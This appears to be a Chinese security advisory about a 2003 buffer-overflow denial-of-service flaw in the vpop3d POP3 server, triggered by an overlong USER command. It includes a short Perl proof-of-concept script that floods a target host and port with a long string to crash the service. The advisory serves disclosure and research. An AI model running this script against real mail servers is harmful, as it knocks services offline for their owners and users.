首页 -> 安全研究

安全研究

安全漏洞
WVpop3d超长USER命令远程拒绝服务攻击漏洞

发布日期:2003-08-22
更新日期:2003-08-28

受影响系统:
vpop3d vpop3d
描述:
BUGTRAQ  ID: 8473

Vpop3d是一款支持POP3协议的程序。

Vpop3d没有正确处理USER命令参数,远程攻击者可以利用这个漏洞对POP3服务进行拒绝服务攻击。

服务程序由于没有充分处理带有超长字符串的USER用户名,攻击者提交提交恶意请求导致发生缓冲区溢出,使服务程序崩溃,精心构建提交数据可能以vpop3d进程权限在系统上执行任意指令。

<*来源:Daniel (deadbeat@sdf.lonestar.org
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106157300501641&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Daniel (deadbeat@sdf.lonestar.org)提供了如下测试方法:

#!/usr/bin/perl

#vpop3d Denial Of Service..
#Proof of Concept script..
#Deadbeat, uk2sec..
#e: deadbeat sdf lonestar org
#e: daniels legend co uk

use IO::Socket;
$host = $ARGV[0];
$port = $ARGV[1];
if(!$ARGV[1]){
        die "usage: perl $0 <host> <port>\n";
}
$dos = "%s%s"x5000;
$req = "USER $dos";
$sox = IO::Socket::INET->new(
        Proto=>"tcp",
        PeerPort=>$port,
        PeerAddr=>$host
)or die "can't connect to $host : $port\n";
sleep 2;
print $sox $dos;
sleep 1;
print "done..vpop3d should lock now :)\n";

建议:
厂商补丁:

vpop3d
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://chaogic.com/vhost/

浏览次数:2966
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障